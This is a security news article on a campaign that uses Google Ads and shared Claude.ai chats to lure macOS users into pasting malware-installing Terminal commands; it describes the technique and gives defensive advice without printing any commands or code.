Cybercriminals are using Google Ads and publicly shared Claude AI chats to trick macOS users into infecting their devices with malware disguised as legitimate installation instructions.
The campaign targets users searching Google for terms such as “Claude mac download.” Victims are shown sponsored search results that appear to lead to the legitimate Claude AI platform but instead redirect users to malicious installation pages.
Researchers found that attackers abused publicly accessible Claude.ai shared chats to host fake setup instructions masquerading as official guidance from “Apple Support.” The malicious chats instruct users to open Terminal and paste commands that silently download and execute malware on macOS systems.
Security researcher Berk Albayrak first identified the operation and warned that multiple malicious Claude chats were being used simultaneously with different infrastructure and payloads.
The attack relies heavily on trust manipulation. Instead of directing victims to obviously fake phishing domains, attackers abuse legitimate services and trusted platforms to make the malicious instructions appear authentic. Researchers say this significantly increases the likelihood that technically savvy users will follow the instructions without suspicion.
AdGuard researchers previously documented similar campaigns involving malicious user-generated pages hosted directly on the Claude.ai domain. Attackers created fake installation guides containing hidden commands designed to download malware from attacker-controlled servers. Because the pages existed on a legitimate Claude.ai subdomain, many users mistakenly assumed the content was officially endorsed.
The malicious commands often use obfuscated or Base64-encoded shell scripts to hide their true behavior. Once executed, the payload can download additional malware, establish persistence, steal credentials, and give attackers remote access to infected systems.
Earlier investigations by Bitdefender and Sophos linked related campaigns to malware families including MacSync, Beagle, DonutLoader, and PlugX-associated backdoors. Some variants targeted developers and security professionals specifically, aiming to steal browser credentials, SSH keys, cryptocurrency wallets, GitHub tokens, and enterprise access credentials.
Researchers say the campaign is particularly dangerous because it blends naturally into common developer workflows. Users searching for AI coding tools or package managers already expect to run terminal commands as part of installation processes, making malicious instructions less suspicious than traditional phishing techniques.
The abuse of Google Ads has also become a major concern. Attackers purchase sponsored search results using trusted keywords, allowing malicious links to appear above legitimate search results. In several documented cases, the ads displayed authentic-looking Claude.ai URLs even though the linked content was attacker-controlled user-generated material.
Researchers warn that macOS users should avoid blindly copying terminal commands from AI chats, forums, or search results, even when the pages appear to belong to trusted domains. Security experts also recommend carefully inspecting sponsored links and avoiding installation instructions that use encoded or heavily obfuscated shell commands.